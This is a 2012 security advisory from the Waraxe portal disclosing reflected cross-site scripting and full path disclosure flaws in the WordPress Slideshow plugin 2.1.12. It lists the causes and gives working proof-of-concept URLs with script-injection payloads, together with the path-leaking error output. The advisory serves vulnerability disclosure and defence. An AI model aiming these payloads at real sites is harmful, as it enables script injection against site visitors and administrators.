Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
April 20, 2024
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 629
Members: 0
Total: 629
PacketStorm News
·301 Moved Permanently

read more...
[waraxe-2012-SA#092] - Multiple Vulnerabilities in Wordpress Slideshow Plugin





Author: Janek Vind "waraxe"
Date: 17. October 2012
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-92.html


Description of vulnerable target:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Slideshow provides an easy way to integrate a slideshow for any WordPress
installation.

Any image can be loaded into the slideshow by picking it from the WordPress
media page, even images you've already uploaded can be inserted into your
slideshow right away!

http://wordpress.org/extend/plugins/slideshow-jquery-image-gallery/

Affected version: 2.1.12

###############################################################################
1. Reflected XSS in "views/SlideshowPlugin/slideshow.php"
###############################################################################

Reasons:
1. Uninitialized variables "$randomId", "$slides" and "$settings"
2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "randomId", "slides" and "settings"
Preconditions: PHP directive register_globals=on


Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId="><script>alert(123);</script>
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=<script>alert(123);</script>
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?settings=<body+onload='alert(123)'>


###############################################################################
2. Reflected XSS in "views/SlideshowPluginPostType/settings.php"
###############################################################################

Reasons:
1. Uninitialized variables "$settings" and "$inputFields"
2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "settings" and "inputFields"
Preconditions: PHP directive register_globals=on


Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=<script>alert(123);</script>
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[0][]&inputFields[0]=<script>alert(123);</script>


###############################################################################
3. Reflected XSS in "views/SlideshowPluginPostType/style-settings.php"
###############################################################################

Reasons:
1. Uninitialized variables "$settings" and "$inputFields"
2. Improper encoding or escaping of output
Attack vectors: User-supplied parameters "settings" and "inputFields"
Preconditions: PHP directive register_globals=on


Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0][3]=<script>alert(123);</script>
http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=<script>alert(123);</script>


###############################################################################
4. Full Path Disclosure in multiple scripts
###############################################################################

Reasons: Direct request to php script triggers pathname leak in error message
Preconditions: PHP directive display_errors=on
Result: Information Exposure Through an Error Message

Tests:

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/slideshow.php

Fatal error: Call to undefined function add_action() in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryslideshow.php on line 34

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/classes/SlideshowPluginWidget.php

Fatal error: Class 'WP_Widget' not found in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryclassesSlideshowPluginWidget.php on line 8

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php

Fatal error: Class 'SlideshowPluginMain' not found in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginslideshow.php on line 111

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/information.php

Fatal error: Call to undefined function _e() in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginPostTypeinformation.php on line 1

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php

Warning: Invalid argument supplied for foreach() in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginPostTypesettings.php on line 3

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/slides.php

Fatal error: Class 'SlideshowPluginSlideInserter' not found in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginPostTypeslides.php on line 3

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php

Warning: Invalid argument supplied for foreach() in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginPostTypestyle-settings.php on line 2

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/support-plugin.php

Fatal error: Call to undefined function _e() in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginPostTypesupport-plugin.php on line 3

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginSlideInserter/insert-image-button.php

Fatal error: Call to undefined function _e() in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginSlideInserterinsert-image-button.php on line 1

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginSlideInserter/insert-text-button.php

Fatal error: Call to undefined function _e() in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginSlideInserterinsert-text-button.php on line 1

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginSlideInserter/insert-video-button.php

Fatal error: Call to undefined function _e() in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginSlideInserterinsert-video-button.php on line 1

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginSlideInserter/search-popup.php

Fatal error: Call to undefined function submit_button() in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginSlideInsertersearch-popup.php on line 6

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginUpload/upload-button.php

Fatal error: Call to undefined function _e() in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginUploadupload-button.php on line 1

http://localhost/wp342/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginWidget/form.php

Fatal error: Using $this when not in object context in
C:apache_wwwwp342wp-contentpluginsslideshow-jquery-image-galleryviewsSlideshowPluginWidgetform.php on line 2



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe@yahoo.com
Janek Vind "waraxe"

Waraxe forum: http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- [ EOF ] ------------------------------------









Copyright © by Waraxe IT Security Portal All Right Reserved.

Published on: 2012-10-17 (13984 reads)

[ Go Back ]
Top members by posts
waraxe  waraxe - 2407
vince213333  vince213333 - 737
pexli  pexli - 665
Mullog  Mullog - 540
demon  demon - 485
shai-tan  shai-tan - 477
LINUX  LINUX - 404
Cyko  Cyko - 375
tsabitah  tsabitah - 328
y3dips  y3dips - 281
SecurityFocus
Currently there is a problem with headlines from this site
alexa



Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2020 Janek Vind "waraxe"
Page Generation: 0.133 Seconds